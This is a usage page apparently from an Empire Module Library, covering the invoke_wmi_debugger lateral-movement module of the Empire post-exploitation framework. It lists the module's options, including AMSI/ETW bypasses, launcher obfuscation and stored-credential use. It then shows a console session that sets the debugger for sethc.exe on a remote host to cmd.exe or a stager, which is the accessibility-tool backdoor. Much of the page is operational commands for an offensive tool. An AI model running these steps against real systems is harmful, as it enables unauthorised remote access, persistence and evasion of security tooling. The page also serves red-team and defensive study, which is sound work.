Invoke-WMIDebugger - Empire Module


This page contains detailed information about how to use the powershell/lateral_movement/invoke_wmi_debugger Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-WMIDebugger
Module: powershell/lateral_movement/invoke_wmi_debugger
Source code [1]: empire/server/modules/powershell/lateral_movement/invoke_wmi_debugger.yaml
Source code [2]: empire/server/modules/powershell/lateral_movement/invoke_wmi_debugger.py
MITRE ATT&CK: T1047
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: No

The invoke_wmi_debugger module uses WMI to set the debugger for a target binary on a remote machine to be cmd.exe or a stager.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the invoke_wmi_debugger module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the invoke_wmi_debugger module:

Agent
Agent to run module on.

ComputerName
Host[s] to execute the stager on, comma separated.

TargetBinary
Target binary to set the debugger for (sethc.exe, Utilman.exe, osk.exe, Narrator.exe, or Magnify.exe).
Default value: sethc.exe.

Additional Module Options


This is a list of additional options that are supported by the invoke_wmi_debugger module:

Binary
Binary to set for the debugger.
Default value: C:\Windows\System32\cmd.exe.

Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw.

Cleanup
Switch. Disable the debugger for the specified TargetBinary.

CredID
CredID from the store to use.

Listener
Listener to use.

Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False.

ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1.

Password
Password to use to execute command.

RegPath
Registry location to store the script code. Last element is the key name.
Default value: HKLM:Software\Microsoft\Network\debug.

UserName
[domain\]username to use to execute command.

Invoke_wmi_debugger Example Usage


Here's an example of how to use the invoke_wmi_debugger module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/lateral_movement/invoke_wmi_debugger

 Author       @harmj0y                                                             
 Background   False                                                                
 Description  Uses WMI to set the debugger for a target binary on a remote machine 
              to be cmd.exe or a stager.                                           
 Language     powershell                                                           
 Name         powershell/lateral_movement/invoke_wmi_debugger                      
 NeedsAdmin   False                                                                
 OpsecSafe    False                                                                
 Techniques   http://attack.mitre.org/techniques/T1047                             


,Record Options----,-------------------------------------,----------,-------------------------------------,
| Name             | Value                               | Required | Description                         |
|------------------|-------------------------------------|----------|-------------------------------------|
| Agent            |                                     | True     | Agent to run module on.             |
|------------------|-------------------------------------|----------|-------------------------------------|
| Binary           | C:\Windows\System32\cmd.exe         | False    | Binary to set for the debugger.     |
|------------------|-------------------------------------|----------|-------------------------------------|
| Bypasses         | mattifestation etw                  | False    | Bypasses as a space separated list  |
|                  |                                     |          | to be prepended to the launcher.    |
|------------------|-------------------------------------|----------|-------------------------------------|
| Cleanup          |                                     | False    | Switch. Disable the debugger for    |
|                  |                                     |          | the specified TargetBinary.         |
|------------------|-------------------------------------|----------|-------------------------------------|
| ComputerName     |                                     | True     | Host[s] to execute the stager on,   |
|                  |                                     |          | comma separated.                    |
|------------------|-------------------------------------|----------|-------------------------------------|
| CredID           |                                     | False    | CredID from the store to use.       |
|------------------|-------------------------------------|----------|-------------------------------------|
| Listener         |                                     | False    | Listener to use.                    |
|------------------|-------------------------------------|----------|-------------------------------------|
| Obfuscate        | False                               | False    | Switch. Obfuscate the launcher      |
|                  |                                     |          | powershell code, uses the           |
|                  |                                     |          | ObfuscateCommand for obfuscation    |
|                  |                                     |          | types. For powershell only.         |
|------------------|-------------------------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1                         | False    | The Invoke-Obfuscation command to   |
|                  |                                     |          | use. Only used if Obfuscate switch  |
|                  |                                     |          | is True. For powershell only.       |
|------------------|-------------------------------------|----------|-------------------------------------|
| Password         |                                     | False    | Password to use to execute command. |
|------------------|-------------------------------------|----------|-------------------------------------|
| RegPath          | HKLM:Software\Microsoft\Network\deb | False    | Registry location to store the      |
|                  | ug                                  |          | script code. Last element is the    |
|                  |                                     |          | key name.                           |
|------------------|-------------------------------------|----------|-------------------------------------|
| TargetBinary     | sethc.exe                           | True     | Target binary to set the debugger   |
|                  |                                     |          | for (sethc.exe, Utilman.exe,        |
|                  |                                     |          | osk.exe, Narrator.exe, or           |
|                  |                                     |          | Magnify.exe)                        |
|------------------|-------------------------------------|----------|-------------------------------------|
| UserName         |                                     | False    | [domain\]username to use to execute |
|                  |                                     |          | command.                            |
'------------------'-------------------------------------'----------'-------------------------------------'

(Empire: usemodule/powershell/lateral_movement/invoke_wmi_debugger) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/lateral_movement/invoke_wmi_debugger) > set ComputerName dbserver-01
[*] Set ComputerName to dbserver-01
(Empire: usemodule/powershell/lateral_movement/invoke_wmi_debugger) > set TargetBinary sethc.exe
[*] Set TargetBinary to sethc.exe
(Empire: usemodule/powershell/lateral_movement/invoke_wmi_debugger) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.